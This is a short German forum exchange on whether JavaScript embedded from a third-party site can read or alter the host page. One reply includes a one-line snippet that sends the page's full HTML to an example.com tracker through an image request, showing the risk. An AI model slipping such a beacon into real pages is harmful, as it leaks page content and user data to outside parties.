nicht angemeldet
Hi,
Angenommen ein unbedarfter Seitenbetreiber bindet via <script> JavaScript-Code einer anderen Seite ein (z.B. Kalender, Shoutbox, Statistik, etc.). Ist es theoretisch möglich, dass dieser Dienst-Anbieter über das JavaScript den HTML-Quelltext der kompletten Seite ausliest bzw. manipuliert?
ja und ja.
Oder gibt es dagegen Sicherheitsmechanismen in JavaScript bzw. dem Browser?
Die Manipulation des DOM-Trees ist oft genug der Zweck solcher Scripts. Ihn dazu auszulesen könnte unumgänglich sein. Und schon mit einem "new Image().src='//example.com/tracker?code='+escape(document.documentElement.innerHTML)" hätte der Anbieter im Prinzip den Quellcode. Nur wozu?
Cheatah
--
X-Self-Code: sh:( fo:} ch:~ rl:| br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes
X-Self-Code: sh:( fo:} ch:~ rl:| br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes